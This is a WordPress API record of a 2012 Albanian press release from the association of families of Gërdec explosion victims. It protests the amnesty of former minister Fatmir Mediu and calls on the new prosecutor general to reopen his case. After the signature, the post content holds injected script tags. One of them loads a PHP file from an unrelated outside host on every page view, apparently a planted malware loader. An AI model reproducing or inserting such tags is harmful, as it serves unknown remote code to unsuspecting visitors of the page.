{"id":436,"date":"2012-12-17T23:33:26","date_gmt":"2012-12-17T21:33:26","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=436"},"modified":"2013-09-27T23:35:29","modified_gmt":"2013-09-27T21:35:29","slug":"deklarate-per-shtyp-nga-shoqata-e-familjareve-te-viktimave-te-shperthimit-te-gerdecit","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=436","title":{"rendered":"Deklarat\u00eb p\u00ebr shtyp nga Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit"},"content":{"rendered":"<p lang=\"sq-AL\">Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit shpreh indinjat\u00ebn e t\u00eb gjith\u00eb t\u00eb d\u00ebmtuarve t\u00eb G\u00ebrdecit p\u00ebr prov\u00ebn e rradh\u00ebs q\u00eb shtetasit shqiptar\u00eb nuk jan\u00eb t\u00eb barabart\u00eb. Kur ata jan\u00eb t\u00eb varf\u00ebr e pa mb\u00ebshtetje vriten, plagosen, rr\u00ebnohen ekonomikisht dhe m\u00eb pas d\u00ebnohen e masakrohen nga shteti. Nd\u00ebrsa t\u00eb veshurit me pushtet gjejn\u00eb gjithmon\u00eb nj\u00eb vark\u00eb shp\u00ebtimi t\u2019i b\u00ebjn\u00eb bisht drejt\u00ebsis\u00eb. Prova e gjall\u00eb \u00ebsht\u00eb Fatmir Mediu i cili nj\u00eb her\u00eb shp\u00ebtoi nga imuniteti, pastaj shp\u00ebtoi nga vendimi i padrejt\u00eb i Gjykat\u00ebs s\u00eb Lart\u00eb t\u00eb cilin Gjykata Kushtetuese e shfuqizoi, dhe sot shp\u00ebtoi nga amnistia.<\/p>\n<p lang=\"sq-AL\">Ne jemi t\u00eb indinjuar sepse e dinim se \u00e7far\u00eb do ndodhte dhe e ngrit\u00ebm z\u00ebrin q\u00eb p\u00ebrpara se Kuvendi ta miratonte amnistin\u00eb. B\u00ebm\u00eb thirrje q\u00eb t\u00eb mos prekej hetimi apo gjykimi i ngjarjes s\u00eb G\u00ebrdecit dhe thirrjen ton\u00eb e d\u00ebgjuan edhe nd\u00ebrkomb\u00ebtar\u00ebt, t\u00eb cil\u00ebt edhe m\u00eb par\u00eb e kishin ngritur shqet\u00ebsimin e tyre n\u00eb raportet e publikuara. Por k\u00ebto thirrje nuk u d\u00ebgjuan dhe ja ku jemi sot n\u00eb k\u00ebt\u00eb situat\u00eb ku nj\u00eb minist\u00ebr sfidon drejt\u00ebsin\u00eb p\u00ebrs\u00ebri.<\/p>\n<p lang=\"sq-AL\">Duke qen\u00eb se drejt\u00ebsia shqiptare d\u00ebshtoi n\u00eb k\u00ebt\u00eb aspekt, ne do t\u00eb detyrohemi q\u00eb me k\u00ebrkesat tona t\u00eb drejta t\u2019i drejtohemi Gjykat\u00ebs Europiane t\u00eb t\u00eb Drejtave t\u00eb Njeriut n\u00eb Strasburg. Drejt\u00ebsia shqiptare i ka patur t\u00eb gjitha shanset dhe koh\u00ebn e mjaftueshme, nga viti 2009 kur \u00e7\u00ebshtja filloi e deri tani, ta gjykonte \u00e7\u00ebshtjen, pa pritur q\u00eb t\u00eb vinte koha p\u00ebr k\u00ebt\u00eb amnisti. Gjithashtu, dhe n\u00eb raste t\u00eb tjera kur amnistia \u00ebsht\u00eb p\u00ebrdorur p\u00ebr t\u00eb mbyllur \u00e7\u00ebshtje t\u00eb ngjashme, GJEDNJ i ka konsideruar k\u00ebto raste si shkelje, duke theksuar se hetimi dhe gjykimi penal duhet t\u00eb garantohen n\u00eb \u00e7do rast kur k\u00ebrkohen nga t\u00eb d\u00ebmtuarit.<\/p>\n<p lang=\"sq-AL\">Megjithat\u00eb shtetasi Fatmir Mediu ka ende akuza t\u00eb cilave nuk u ka b\u00ebr\u00eb akoma bisht, dhe q\u00eb jan\u00eb pezulluar p\u00ebr shkak t\u00eb imunitetit parlamentar. Sot imuniteti nuk \u00ebsht\u00eb m\u00eb penges\u00eb, ndaj presim nga Prokurori i P\u00ebrgjithsh\u00ebm t\u00eb rinis\u00eb ndjekjen e \u00e7\u00ebshtjes. I kemi k\u00ebrkuar kryeprokurores Ina Rama q\u00eb t\u00eb niste procedimin penal q\u00eb n\u00eb dat\u00eb 26 tetor 2012, dit\u00ebn q\u00eb imuniteti zyrtarisht u hoq si penges\u00eb p\u00ebr t\u00eb proceduar penalisht deputet\u00ebt\u00a0dhe ministrat. E kuptojm\u00eb q\u00eb Znj. Ina Rama mund t\u00eb mos ket\u00eb qen\u00eb shum\u00eb e fokusuar n\u00eb k\u00ebt\u00eb \u00e7\u00ebshtje q\u00eb kur diskutohej fundi i mandatit t\u00eb\u00a0saj. Por sot, me ardhjen e kryeprokurorit t\u00eb ri Z. Adriatik Llalla, duke i uruar atij suksese n\u00eb detyr\u00ebn e re, i kujtojm\u00eb se suksesi i tij varet s\u00eb pari nga k\u00ebto \u00e7\u00ebshtje kaq t\u00eb r\u00ebnd\u00ebsishme, si zbardhja e ngjarjes s\u00eb G\u00ebrdecit. P\u00ebr k\u00ebt\u00eb arsye presim prej tij q\u00eb pa humbur koh\u00eb, t\u00eb rinis\u00eb procedimin penal ndaj Fatmir Mediut n\u00eb Gjykat\u00ebn e Lart\u00eb meq\u00ebn\u00ebse tashm\u00eb nuk ka as edhe nj\u00eb penges\u00eb t\u00eb vetme p\u00ebr t\u00eb proceduar.<\/p>\n<p lang=\"sq-AL\">Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit shprehet e vendosur p\u00ebr t\u00eb vazhduar k\u00ebrkimin e t\u00eb gjith\u00eb rrug\u00ebve ligjore p\u00ebr t\u00eb zbardhur ngjarjen dhe v\u00ebn\u00eb para p\u00ebrgjegj\u00ebsis\u00eb\u00a0t\u00eb gjith\u00eb personat e p\u00ebrfshir\u00eb, pavar\u00ebsisht pushtetit q\u00eb ata mund t\u00eb ken\u00eb.<\/p>\n<p lang=\"sq-AL\">Kryetari<\/p>\n<p lang=\"sq-AL\">Feruzan Durdaj<\/p>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb shp\u00ebrthimit t\u00eb G\u00ebrdecit shpreh indinjat\u00ebn e t\u00eb gjith\u00eb t\u00eb d\u00ebmtuarve t\u00eb G\u00ebrdecit p\u00ebr prov\u00ebn [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":439,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/436"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=436"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/436\/revisions"}],"predecessor-version":[{"id":438,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/436\/revisions\/438"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/439"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=436"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=436"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=436"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}